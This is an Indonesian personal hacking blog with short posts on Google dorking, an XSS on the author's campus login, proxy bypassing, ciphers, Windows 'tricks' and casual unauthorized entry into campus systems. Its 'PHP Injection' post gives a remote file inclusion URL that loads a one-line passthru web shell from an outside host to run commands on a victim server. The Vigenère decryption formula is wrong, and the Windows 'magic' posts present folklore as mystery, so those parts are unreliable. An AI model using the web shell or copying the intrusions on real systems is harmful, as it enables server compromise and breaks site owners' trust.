Top Valued Websites ….

Kemarin dapat dari om thesims sebuah link, penasaran dari nama linknya. Ini salah satu kutipan dari penjelasan website tersebut :

Your Website Value is basically a calculator that evaluate the yearly potential value of a website based on many factors such as: Number of pages indexed in search engines; Number of sites linking to the website; Quality of website; Popularity of the website.

situs pencari google, menduduki peringkat pertama, sedangkan yahoo berada peringkat kedua. gimana dengan website km?

ini linknya -> http://www.yourwebsitevalue.com/

Squid UNS ….

Kemarin iseng – iseng searching di google pke dork “exnome”, ternyata banyak juga yah …. he..he….
Nggak nyangka ketemu link bagus, coba buka ah, siapa tau nickku ada diwebsite gedhe …. wew, ternyata ada di websitenya uns.ac.id, tp tuh ada di squidnya? Namanya Squid Analysis Report Generator. proxynya? mungkin ada yang pake proxy uns trs buka blogku ini ….. tp napa permission allow gtu sampe semua orang bisa liat2. mungkin sebaiknya cuman orang – orang tertentu aja yang bisa liat … atau emang tuh kebijaksanaannya begitu …. nggak taulah ….. mklum cuman iseng – iseng malah dapat begituan ….he..he…
Screenshoutnya : http://farm4.static.flickr.com/3205/3099557194_2d0226cf6c_o.jpg

kena XSS ……

Baru saja aku masuk ke website kampusku, aku mau liat KRS-ku. Karena udah lama bgt nggak ngisi KRS. Sebelum masuk ke halaman akademik, setiap mahasiswa dan dosen harus login terlebih dahulu. Aku coba pake username = NIM dan password dulu yang masih ku ingat. Ternyata nggak bisa masuk. Muncul pesan kalau login salah / error.
Setelah diliat-liat, ternyata …wew …. ada bugsnya …. yaitu XSS. Coba-coba aja isengin dikit …. he..he….
hasilnya kyak gini = http://farm4.static.flickr.com/3199/3082001584_4fae0bd536_o.jpg

Referensi:
http://en.wikipedia.org/wiki/Cross-site_scripting

Lewatin Proxy …..

Aku sebel bgt klo pake koneksi internet yang tidak bisa bebas, mau browsing susah bgt, mo pke ini itu trhambat, misalnya mau pake YM dan Gtalk. Kebetulan aku ikutan disalah forum keamanan di Indonesia, tuh forum gdhe lah, master2nya kumpul distu semua. Setelah aku tanyakan tentang permasalahku, akhirnya ada seorang master yang bernama om letjen, mengasih sebuah link untuk dapat mem-by pass proxy server dengan menggunakan software. Linknya : http://www.your-freedom.net/
Sebenarnya cara kerja software tuh hampir mirip klo pke konsep anonymous, cmn software tuh udah support beberapa aplikasi yang konek dengan internet, misalnya YM dan Gtalk. klo MiRC belum sempat aku coba, mngkin bisa, karena YM, Gtalk sama dengan MiRC ….. ada juga seh pke tunneling, pernah berhasil tembus proxy, tp gagal lagi….. mngkin aku masih newbie yah ….he..he….
wah …. akhirnya proxy dapat teratasi dengan cepat

Filter Situs Asusila Depkominfo

Nggak tau iseng – iseng pke dork di google, eh malah ketemu websitenya depkominfo, terus liat2 detailnya ketemu kyk ginian ….
http://www.depkominfo.go.id/datafile/Filter%20Situs%20Asusila/
wah website gedhe seperti pemerintahan, kok masih ada juga bugsnya, neh seharusnya diatur permissionnya. moga2 aja nggak banyak website2 indonesia yang seperti ini ……

My Desktop

desktop di PC Kantor, PC rumah lom smpt dicapture … he.. he….
suka yang item2, lebih simple and elegan ….

ADFGVZ Cipher

Adalah cipher yang digunakan Jerman pada perang dunia I, dan berhasil dipecahkan oleh orang berkebangsaan Prancis.
Cipher ini menggunakan alphabet a-z dan angka 0-9 ditambah dengan karakter tertentu yaitu . , ? ! < > + = * : ; $

Bentuk tabelnya :
A D F G V X Z
A a b c d e f g
D h i j k l m n
F o p q r s t u
G v w x y z 0 1
V 2 3 4 5 6 7  8
X 9 . , ? ! <
Z > + = * : ; $

Misal c = AF, b = AD

Vigenère_cipher

Adalah cipher polyalphabet yang dimana tiap hurufnya mempunyai beberapa tempat dari alphabet tersebut. Pada kolom dan baris adalah alphabet a-z sedangkan pertemuan dari keduanya juga merupakan alphabet a-z yang memiliki suatu pola tersendiri dari tiap kolom maupun barisnya.
Contoh :
Plaintext : ATTACKATDAWN
Key : LEMON

ATTACKATDAWN
LEMONLEMONLE

Ciphertext : LXFOPVEFRNHR

Jika alphabet a-z adalah 0-25 maka dapat ditulis dengan rumus :
Encrypsi
C = P + K (mod26)

Decrypsi
P = C + K (mod26)

ROT-13 Chiper

ROT-13 adalah enkripsi sederhana yang menggunakan pergeseran karakter 13 kali. Dapat pula ditulis dengan rumus :

ROT₁₃(ROT₁₃(x)) = ROT₂₆(x) = x for any text x.

Karna alphabet jumlahnya ada 26.

Varian dari ROT-13 antara lain ROT-18 (TOT-13+5) yaitu ditambah dengan angka 0-9 sehingga bentuknya 0=5,1=6,2=7,3=8,4=9 dan ROT-47 dimana angka dan alphabet ditambah dengan karakter spesial termasuk spasi, dimana karakter-karakter tersebut terdapat dalam ASCII, misalnya ~, !, dan sebagainya.
Contohnya :
The Quick Brown Fox Jumps Over The Lazy Dog.
…enciphers to…
%96 "F:4< qC@H? u@I yF>AD ~G6C %96 {2KJ s@8]

ROT-13 chiper merupakan chiper termudah dan umum dalam seputar encrypt data.

MAGIC Windows

Mungkin neh udah basi bgt, tapi lebih baik basi, daripada nggak tau sama sekali. He…he….

MAGIC #1

Orang India menemukan bahwa tidak ada seorang pun yang dapat membuat FOLDER di komputer dengan program Microsoft manapun dengan judul folder “CON”, “LPT1″, “COM1″. Ini merupakan hal nyata dan seluruh kru Microsoft sendiri tidak dapat menjawabnya kenapa hal ini bisa terjadi. Cobalah dengan membuat sebuah folder dengan nama CON atau con.

Bukalah My Document -> File -> New -> Folder -> ketik CON atau Con atau con

Apa yang terjadi?

MAGIC #2
Bagi anda para pengguna Windows, lakukanlah hal berikut ini:

1) Buka sebuah notepad file kosong

2) Ketiklah “Bush hid the facts” (tanpa tanda kutip ya)

3) Save di mana pun anda suka

4) Tutuplah dan bukalah kembali file tersebut.

Aneh bukan?

MAGIC #3: Microsoft Crazy Facts

Cobalah hal yang menarik ini, sungguh aneh! Bahkan Bill Gates sendiri tidak menemukan jawabannya kenapa ini bisa terjadi! Hal ini ditemukan oleh orang Brazil.Cobalah!

1)Buka program Microsoft Word dan ketik: =rand (200, 99)

2) kemudian anda ENTER

Apa yang anda temukan? Menarik bukan? coba aja…..

Runtime Error http://mail.live.com

rabu, 19 maret 2008 pkl 9.22 AM.
neh aku temuin wktu akses ke hotmail.com, tiba2 direct ke mail.live.com, karna hotmail msh satu atap dgn msn (microsoft).
Server Error in ‘/’ Application.

<!– Web.Config Configuration File –>

<configuration>
<system.web>
<customErrors mode=”Off”/>
</system.web>
</configuration>

<!– Web.Config Configuration File –>

<configuration>
<system.web>
<customErrors mode=”RemoteOnly” defaultRedirect=”mycustompage.htm”/>
</system.web>
</configuration>

screent shotnya : ini dia

Upss………

Sory, bukannya aku mo h**k kampus sendiri, tp aku cuman mo liat, eh malah bisa masuk. Ini hasilnya :

Lemlit
Dosen
alumni

Tapi aku nggak ngapain2 kok, suer….Jadi bwt adminnya segela diperbaiki, ada vul di webnya.

Addons Mozilla sbg Tools H***ck

Add ons Mozilla yg dapat dimanfaatkan sbgt tools h***ck dkk :

1. HackBar [ https://addons.mozilla.org/en-US/firefox/addon/3899 ]
2. FireBug [ https://addons.mozilla.org/en-US/firefox/addon/1843 ]
3. Anonymouser [ https://addons.mozilla.org/en-US/firefox/addon/1415 ]
4. Whois [ https://addons.mozilla.org/en-US/firefox/addon/603 ]
5. Web Developer [ https://addons.mozilla.org/en-US/firefox/addon/60 ]

Baca entri selengkapnya »

PHP Injection

Sudah banyak artikel2 yang membahas PHP injection. Salah satu command yang sering dipergunakan dalam aksi ‘php injection’ adalah ‘ls -al’ untuk melihat isi direktori. Seperti misalnya:
http://www.korban.com/index.php?page=http://www.situsku.com/cmd.txt &?cmd=ls -al

Dimana isi dari http://www.situsku.com/cmd.txt adalah
// begin of cmd.txt
<? passthru($_GET[cmd]); ?>
// end of cmd.txt

Namun, terkadang aksi itu gagal, tidak menghasilkan apapun atau hanya menghasilkan error. Salah satu kemungkinan penyebab kegagalan, fungsi dari passthru di’disable’ oleh sang admin. Tentunya hal ini dilakukan oleh sang admin dengan alasan keamanan. Tapi kita bisa mengakalinya dengan membuat script untuk melihat isi direktori.

Berikut script yang penulis modifikasi dari php manual:

Baca entri selengkapnya »

Bagaimana Membuat Distro Linux Baru ?

Distro linux? Yup, distro linux adalah kernel linux yang ditambah beberapa paket-paket yang dikemas menjadi satu kesatuan, dengan tujuan untuk mempermudah proses distribusinya. Kernel linux dari distro biasanya udah mengalami sedikit perubahan sesuai dengan vendor-vendor distro tersebut. Sedangkan kernel linux yang masih asli disebut dengan vanila kernel ( dpt diambil di http://www.kernel.org ).

          Ada beberapa hal yang perlu diperhatikan dalam pembuatan / pemgembangan distro linux. Pertama, pembuatan distro tersebut harus mempunyai tujuan yang jelas dan spesifik. Kedua, apakah kita membuat distro dengan remastering atau LFS. Ketiga, masalah pemeliharaan distro tersebut dikemudian harinya.

          Mungkin distro linux yang sekarang lagi dibutuhkan banyak orang adalah masalah kemudahan menggunakannya ( interface-nya ). Karena beberapa OS semakin lama semakin mudah dalam pengoperasiaanya. Meskipun masih ada beberapa yang perlu dipertimbangkan hal-hal lainnya, seperti software yang support OS, hardware support, bug-bug, dan patch yang up to date.